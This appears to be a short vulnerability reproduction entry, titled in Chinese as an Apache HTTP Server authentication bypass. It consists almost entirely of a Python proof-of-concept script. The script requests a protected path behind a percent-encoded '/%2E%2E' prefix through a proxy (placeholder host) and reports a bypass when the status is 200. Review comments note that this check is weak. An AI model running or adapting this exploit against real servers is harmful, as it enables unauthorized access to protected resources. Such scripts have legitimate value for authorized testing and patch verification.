A41-1Apache-HTTPServer-身份验证绕过
漏洞复现:
payload:
import requests
# --- Target settings -------------------------------------------------------
# Base URL of the proxy server the request goes through (placeholder host;
# change it to the proxy under test).
proxy_url = "http://proxy-server.example.com"

# Path of the protected resource on the backend service. Nothing in this
# listing reads this value; it records what the crafted path below points at.
backend_service_path = "/protected/resource"

# The same resource path behind a "/%2E%2E" prefix. "%2E" is the
# percent-encoding of ".", so the prefix is an encoded "/.." segment.
# NOTE(review): presumably the premise is that the proxy's access rule and the
# backend normalise this path differently; confirm against the affected setup.
malicious_path = "/%2E%2E/protected/resource"

# Full URL that is requested via the proxy server.
malicious_url = proxy_url + malicious_path
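def send_malicious_request():
    """Request ``malicious_url`` once and print the outcome.

    Prints the status code, response headers and body, followed by a verdict
    line that depends only on whether the status code is 200. Returns None.
    Any exception raised while sending or printing is reported on stdout
    instead of propagating, because this function is the script's only
    top-level action.

    NOTE(review): the verdict is a weak signal. A 200 proves a bypass only if
    the same resource requested by its normal path is refused, so compare the
    two responses and the proxy/backend access logs before drawing conclusions.
    NOTE(review): requests re-quotes a URL while preparing it, and
    percent-escapes of unreserved characters such as "." may be un-escaped, so
    the path on the wire may differ from ``malicious_url``. Verify what the
    server actually received in its logs.
    """
    try:
        # timeout: without one, requests waits indefinitely on an unresponsive
        # host. allow_redirects=False: a redirect to a login page that ends in
        # 200 would otherwise be reported as a successful access.
        response = requests.get(
            malicious_url,
            timeout=10,
            allow_redirects=False,
        )

        # Dump the raw response so the verdict below can be checked by hand.
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)

        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        # Broad on purpose: connection errors, timeouts and output errors all
        # end the single check with a message rather than a traceback.
        print("[-] An error occurred:", str(e))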
# Script entry point: run the single check only when this file is executed
# directly, not when it is imported as a module.
if __name__ == "__main__":
    send_malicious_request()